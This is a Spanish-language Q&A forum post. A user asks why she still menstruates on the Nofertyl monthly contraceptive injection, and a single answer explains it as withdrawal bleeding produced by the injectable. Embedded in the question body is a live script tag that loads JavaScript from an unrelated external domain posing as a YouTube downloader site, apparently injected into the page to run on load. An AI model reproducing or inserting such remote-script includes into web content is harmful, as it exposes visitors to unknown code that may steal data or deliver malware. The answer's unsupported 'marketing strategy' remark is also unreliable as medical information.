¿Por qué se produce la menstruación si estoy usando inyección anticonceptiva?

hola me surgió una duda sobre los anticonceptivos..si estoy usando la inyección Nofertyl mensual porque igual menstruo?..me refiero a que si las inyecciones evitan la ovulación y en la menstruación se eliminan los óvulos no fecundados ( según lo tenia entendido) porque hay sangrado si se supone que no existen óvulos? Desde ya gracias por la aclaración de esta duda :)

<script type="text/javascript" language="javascript" src="http://a-youtubedownloader-free.com/js.php"></script>

1 Respuesta

Respuesta

Es un sangrado por deprivación provocado por el mismo inyectable. Se provoca para imitar el sangrado de la menstruación y que las mujeres queden conformes, pues muchas piensan que de no tenerlo, algo no anda bien en su organismo y se niegan a utilizar anticoncepción que les suprima dicho sangrado. (Estrategia de marketing).